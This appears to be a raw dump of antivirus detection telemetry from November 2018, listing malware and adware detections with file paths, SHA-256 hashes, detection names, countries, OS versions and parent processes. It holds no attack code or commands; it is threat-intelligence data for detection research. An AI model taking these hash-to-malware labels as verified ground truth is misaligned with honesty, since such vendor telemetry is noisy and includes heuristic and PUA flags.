  Row(detection=Row(filename='avscan-20181104-224903-e0fa1044', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cbd99eb2\\AVSCAN-20181104-200142-1862C1A1\\AVSCAN-20181104-224903-E0FA1044', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='631f664852d72a68a5192868894555b2d775c2886a2546411e331912b9bbc405', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:49:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec47', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec47', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='oeaw0c92d3d.dll', filepath='\\\\?\\C:\\Windows\\OeAW0c92d3d.dll', filesize=192000, name='Adware/Elex.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:35:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T23:58:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='beetleju.exe', filepath='\\?\\E:\\Games الألعاب\\Game\\BoberMan\\BeetleJuالبطه الذكيه\\BeetleJu.exe', filesize=1024000, name='HEUR/AGEN.1034691.#M1.#R1'), hash='32e34bec9f0f382af7e83ae78c67f95d103f7eaaf61e24c713d0c62f263fef61', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:48:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225721-0a084f35', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ea88c7e\\AVSCAN-20181104-225700-05C5D5D2\\AVSCAN-20181104-225721-0A084F35', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:57:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000a1fc7', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp000a1fc7', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:07:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140259-f40247aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140259-F40247AA', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='baixaki_audacity_vhvpcd.exe', filepath='C:\\Users\\X\\Downloads\\Baixaki_audacity_VhvPCd.exe', filesize=1844000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='423193b530b82466c1c001b1347fcac61f8a0f4dd1402e911b85d4458d8bd26b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T17:17:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~temp5083140.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~temp5083140.tmp', filesize=448000, name='PUA/LoadMoney.#M1.#R1'), hash='96ed3c7fa79bc55c24e85d367e8070bede957254753339120605f2356b0dc176', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:13:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-154156-2610d418', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_638666ac\\AVSCAN-20181104-154139-23CF8B35\\AVSCAN-20181104-154156-2610D418', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:41:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114449-80270720', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_031d0b06\\AVSCAN-20181104-114432-7D36400C\\AVSCAN-20181104-114449-80270720', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T10:45:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T07:38:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rnsy919.exe', filepath='C:\\Users\\X\\AppData\\Local\\4A078520-1432572570-11E2-990F-089E01585879\\rnsy919.exe', filesize=128000, name='HEUR/AGEN.1029157.#M1.#R1'), hash='248d163a709d044da15cc6be8d75faf3ffef38d473765f0b4b08e6afbe553503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:y2GXSJEeTUuIPWwi.1', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T10:02:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-100609-3880749a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c531c545\\AVSCAN-20181104-100056-11B6C975\\AVSCAN-20181104-100609-3880749A', filesize=192000, name='ADWARE/Adware.Gen.#M1.#R1'), hash='344ba62ba269338d2e1f67d88121e7a53a5bb4d6d06958190c128faf044af500', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:06:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-003053-305bbf07', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3660ac18\\AVSCAN-20181105-003005-292C46FD\\AVSCAN-20181105-003053-305BBF07', filesize=576000, name='TR/Black.Gen2.#M1.#R1'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T22:31:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000621d3', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp000621d3', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161806-5630e20b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6125d533\\AVSCAN-20181104-135312-59F9F13F\\AVSCAN-20181104-161806-5630E20B', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='5fb7ed1e268c301f8c510743bb7b8c756f25b9affcc4d1880f2a5b7f42b18884', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:48:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\F:\\FOTO_FOTO\\2003\\Foto_dll\\setup.exe', filesize=640000, name='W32/Ramnit.C.#M1.#R1'), hash='6456ef46bc46d4476ff0889915def842ffec36d62ab7d42b60ca35637ca9280b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:23:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vmprotectsdk32.exe', filepath='C:\\Users\\X\\Desktop\\IreneZ Full New\\VMProtectSDK32.exe', filesize=64000, name='TR/KillAll.mrsrx.#M1.#R1'), hash='a587c2553b8bdbf97d8fd31ad8daae3659a71d142352b74bb5aacdb0a52b01f5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-04T05:30:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/recovered', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T08:02:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-082010-77a1a88b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_81d92db7\\AVSCAN-20181104-080002-0DFBB89D\\AVSCAN-20181104-082010-77A1A88B', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='689f8d95752084794c09edc4d7e50c7347428fee74c9a37327343f1a517cdcd6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:20:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\CD4E8FC57282BF8FEC5014D2816C12A060E4D6959852D3C0449B84D4BE2DE9BC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cd4e8fc57282bf8fec5014d2816c12a060e4d6959852d3c0449b84d4be2de9bc', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T13:38:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-201134-ee303f47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0e3305e6\\AVSCAN-20181104-201102-E98A4B3F\\AVSCAN-20181104-201134-EE303F47', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='479ec0b4e5878b4a73e8687317be6c8b8572a9141e08142f9728b3592c70d731', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='patch.exe', filepath='c:\\program files (x86)\\vso\\vso downloader\\5\\patch.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='1c70e47c5dcda1d5bba2698c8380c187376ca5d49950e4feea766d1c430432c7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T13:17:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:55:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:01:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165817-699eb446', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5d4647a9\\AVSCAN-20181104-165758-65CADEAA\\AVSCAN-20181104-165817-699EB446', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:58:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-191601-3991bde8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a7165c7a\\AVSCAN-20181104-191501-2F15887D\\AVSCAN-20181104-191601-3991BDE8', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163843-a9b4307f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a15e736\\AVSCAN-20181104-163712-A14B6B69\\AVSCAN-20181104-163843-A9B4307F', filesize=64000, name='WORM/VB.FU.27.#M1.#R1'), hash='56e331b651330979b1d89d722845de80338370b528afebb54e855d4bca2d6f65', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:38:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181102-102040-a47f7318', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-102040-A47F7318', filesize=64000, name='BDS/Rogue.766012.#M1.#R1'), hash='d809a1cf78a0751b6980abcbb83f400d51e369658aefe4ec3acc97bf43fd79af', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-1571694585-2953821203-2531563643-1001\\$R850X49.8\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='EULA', country='CZ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Downloads\\esetonlinescanner_csy.exe', parentsize=6980216, timestamp='2018-11-02T16:07:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered domim', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered domim', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='799dce4b02eb3a40aa802e0176118bef8b43a529a60d553fb6c08b7e7726dad8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T19:21:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R6KQHBJ\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:20:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsz83F0.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T02:13:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101859-966df9f1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101859-966DF9F1', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d572d458c354957a19725df379a4f84f1ac865e23c54f38e10e8281fde070ba0', metadata=Row(cmdline='\\\\\\/Embedding', country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T19:51:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ripforgames.exe', filepath='f:\\prince of persia - the two thrones\\RipForGames.EXE', filesize=5696000, name='W32/Virut.Gen.#M1.#R1'), hash='dc9ed4bd63ee1e2bf73a1eb7a387cb4fd04dd3e879881ddc4382b1b415288a27', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:02:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\破解檔\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='7a538353346d1a0bca614a50c14e009fddf625772e54ea6a1fbe171df460074c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-213609-225da0d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a87c2d3e\\AVSCAN-20181102-213451-189FEC6A\\AVSCAN-20181102-213609-225DA0D4', filesize=320000, name='ADWARE/FileFinder.Gen7.#M1.#R1'), hash='7502868e104aacb5e43d1b5a6a6342c9447e1ee224b943f92697be566487ebcf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:36:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Users/katherine/.Trash/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='HK', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4e8tbo0v3.vir', filepath='\\\\?\\C:\\Program Files\\4E8TBO0V3O\\4E8TBO0V3.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tocol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tocol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c2c74d5724abbb8c4ce1b9b54093850b48820c8d39869f0434e8240d24009071', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:33:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='winrar.exe', filepath='C:\\Users\\X\\Desktop\\Eigene Dateien\\Programme\\Crack WinRar 2.60d\\winrar.exe', filesize=640000, name='TR/Crypt.XPACK.Gen8.#M300.#R700824'), hash='9f711219b81861395b3cc5498306ae915229d39c3fbc31866edb483ee150076e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:37:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='poweriso 6.6 and serial key.exe', filepath='C:\\Users\\X\\Desktop\\nera\\# (installer prog. base)\\# (creare file iso)\\PowerISO\\PowerISO 6.6 and Serial Key\\PowerISO 6.6 and Serial Key.exe', filesize=6144000, name='HEUR/AGEN.1011383.#M1.#R1'), hash='e06e83b21a0aab3d0107dd1bc2fe903113726aa2a0277e66e300374a30008706', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:50:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145033-b6edd330', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_68963e9d\\AVSCAN-20181102-145016-B3DB93BA\\AVSCAN-20181102-145033-B6EDD330', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:50:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwtrig20.exe', filepath='C:\\Program Files (x86)\\Common Files\\microsoft shared\\DW\\DWTRIG20.EXE', filesize=476000, name='W32/Neshta.A.#M1.#R1'), hash='9cba9ef1e8dd4bb883f628fc9a51cbdbedc4ce2eb00ca42212ccce321e7d7f9e', metadata=Row(cmdline='--engine=2 --session-id=xEZ5K0me9D5AhvuygCu58rLzurfu44PRULxy+8cD --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.178.200\\software_reporter_tool.exe', parentsize=13460600, timestamp='2018-11-02T12:22:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-064549-398bde0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9625a9be\\AVSCAN-20181102-064112-1C8CC88F\\AVSCAN-20181102-064549-398BDE0F', filesize=384000, name='TR/Kazy.172396.13.#M1.#R1'), hash='8f1dec1c6b9b63b8db50306eaa71bfdb6d70757a3a6c204d4e0cf5c635cdaf72', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='330d5c7953c9201e1fc277d00d6feec06ee0d18f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\330d5c7953c9201e1fc277d00d6feec06ee0d18f', filesize=2112000, name='Adware/DealPly.ed96ed.#M1.#R1'), hash='ed96edf4a731b0344df2f06c57239849e6479285e4371b19fb37a3f3f35a72c1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:53:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-143007-b811d431', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d55bcb85\\AVSCAN-20181102-142939-B2CBD8F2\\AVSCAN-20181102-143007-B811D431', filesize=1864000, name='PUA/InstallCore.Gen7.#M1.#R1'), hash='b9e3f379f3d1d3d3d2500567e86e1ca1dddceedb41c84109d679be7492844b06', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:16Z'), dt=datetime.date(2018, 11, 2)),
